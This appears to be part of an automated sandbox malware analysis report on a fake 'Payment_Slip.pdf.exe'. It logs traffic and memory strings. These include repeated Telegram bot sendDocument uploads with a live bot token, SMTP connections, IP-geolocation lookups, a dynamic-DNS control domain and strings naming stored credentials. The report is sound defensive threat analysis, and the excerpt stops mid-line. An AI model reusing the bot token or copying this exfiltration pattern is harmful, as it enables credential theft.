                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd701f240ba35cHost: api.telegram.orgContent-Length: 67009Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd79f459671188Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd83b7ecb4b731Host: api.telegram.orgContent-Length: 71981Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd842d776ffebaHost: api.telegram.orgContent-Length: 1083Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8431aa5955fdHost: api.telegram.orgContent-Length: 67150Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8a92e30665c3Host: api.telegram.orgContent-Length: 67013Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd9f0bac1b425aHost: api.telegram.orgContent-Length: 67013Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cba4639Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cbf0ac5Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5ce792d8Host: api.telegram.orgContent-Length: 67009Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                              Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: api.ipify.org
                              Source: unknownDNS query: name: api.ipify.org
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49726 -> 178.237.33.50:80
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
                              Source: global trafficTCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,11_2_0041936B
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                              Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                              Source: Payment_Slip.pdf.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                              Source: global trafficDNS traffic detected: DNS query: ratianaana701.bounceme.net
                              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                              Source: global trafficDNS traffic detected: DNS query: smtp.gmail.com
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: unknownHTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                              Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003050000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/wr2/oBFYYahzgVI.crl0
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                              Source: svchost.exe, 0000000A.00000002.2826707788.000001F041607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eBhMtB.com
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                              Source: edb.log.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                              Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                              Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F04149D000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                              Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001392000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, dwn.exeString found in binary or memory: http://geoplugin.net/json.gp
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dwn.exe, 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe, 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe.5.drString found in binary or memory: http://geoplugin.net/json.gp/C
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/wr2.crt0
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/wr20%
                              Source: bhv8E9.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                              Source: Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 